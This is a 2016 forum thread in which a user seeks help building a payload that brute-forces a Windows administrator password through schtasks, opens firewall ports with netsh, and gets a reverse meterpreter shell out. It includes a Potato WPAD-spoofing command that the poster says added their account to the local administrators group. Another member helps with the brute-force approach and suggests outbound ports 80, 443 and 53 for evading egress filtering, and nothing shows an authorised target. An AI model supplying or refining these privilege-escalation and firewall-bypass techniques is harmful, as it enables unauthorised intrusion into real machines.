vailixi Posted May 21, 2016 Share Posted May 21, 2016 So I wanted to make payload which can be run without admin privileges brute force the admin password by call a program some program with system() that would require a password until the password is found. My question is what is the fastest command you can run from Windows command line that will actually require administrator a password? Also how do I get an error message back for conditional logic that will tell me if I got the right password? Any Ideas? Quote Link to comment Share on other sites More sharing options...
digininja Posted May 22, 2016 Share Posted May 22, 2016 You'll be very limited in what apps you can use because you'll need to pick one that takes the password on the command line. From that list, it shouldn't really matter what you pick as the first thing the app should do is check permissions so they will all fail at about the same speed. Quote Link to comment Share on other sites More sharing options...
vailixi Posted May 29, 2016 Author Share Posted May 29, 2016 (edited) Digininja, any chance you can help me with syntax on this? I think I'm going to just go ahead and brute scheduled task that will open a port on the firewall. I'm not sure on syntax for schtasks and netsh advfirewall. Here's what I was trying for but my syntax is horribly wrong. Not really sure on the options. schtasks /Create /S %computername% /U %username% /P password /TN portopen /SC %time% /tr netsh advfirewall firewall add rule name="Open Port 9999" dir=in action=allow protocol=TCP localport=9999 Edited May 29, 2016 by vailixi Quote Link to comment Share on other sites More sharing options...
vailixi Posted May 29, 2016 Author Share Posted May 29, 2016 (edited) Or maybe something like this: Keep getting syntax errors. I think I need escape characters but not really sure how to write out this command. schtasks /Create /S %computername% /RU %username% /RP password /SC ONCE /TN portopen /TR "netsh advfirewall firewall add rule name=Open Port 9999 dir=in action=allow protocol=TCP localport=9999 /ST 18:44" Edited May 29, 2016 by vailixi Quote Link to comment Share on other sites More sharing options...
digininja Posted May 29, 2016 Share Posted May 29, 2016 Too complicated, why not just do a dir or even a command that doesn't exist? Means you don't have to pass loads of arguments to the command you are calling. And as a way to catch the password, put it in the comment but having said that I'm not sure if you can see other people's tasks so that might not any use. Just monitor the return code instead. Quote Link to comment Share on other sites More sharing options...
vailixi Posted May 29, 2016 Author Share Posted May 29, 2016 I don't get that. Am I piping the password into dir somehow? Quote Link to comment Share on other sites More sharing options...
digininja Posted May 29, 2016 Share Posted May 29, 2016 No, into the schtasks where it says password Quote Link to comment Share on other sites More sharing options...
vailixi Posted May 29, 2016 Author Share Posted May 29, 2016 (edited) OK, ok that makes sense. LOL. I tried this: schtasks /Create /S %computername% /RU desktop/8alleale\me /RP password /SC ONCE /TN dirshow /TR dir /ST 13:30 Now I'm at least getting access denied instead of syntax error. I tried this as well: schtasks /Create /S %computername% /RU %username% /RP password /SC ONCE /TN dirshow /TR dir /ST 13:30 Same this way access denied. Is there something wrong with the way I'm getting the system and username? Edited May 29, 2016 by vailixi Quote Link to comment Share on other sites More sharing options...
vailixi Posted June 5, 2016 Author Share Posted June 5, 2016 Incidentally I found this wpad spoofing attack that seems to work rather well. Potato attack Potato source code on Github Syntax was something like this: Potato.exe -ip 192.168.1.9 -disable_exhaust true cmd "C:\\windows\\system32\\cmd.exe /k net localgroup administrator me add" This actually worked for adding my user to the administrators group. That's cool and all. I still don't have the password for netsh and open a port on the firewall though.Is there a way to just kill the firewall? Quote Link to comment Share on other sites More sharing options...
digininja Posted June 5, 2016 Share Posted June 5, 2016 What is it you are actually trying to achieve as your question is now deviating away from the original topic. Quote Link to comment Share on other sites More sharing options...
vailixi Posted June 5, 2016 Author Share Posted June 5, 2016 Sorry pretty much trying to find new ways to actually get my payload to bypass firewall and make reverse connection reliably. I was using a reserve hop http meterpreter and seemed work for a while. Quote Link to comment Share on other sites More sharing options...
digininja Posted June 5, 2016 Share Posted June 5, 2016 I assume you've tried connecting out on ports 80, 443 and 53, it is rare they are blocked outbound. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.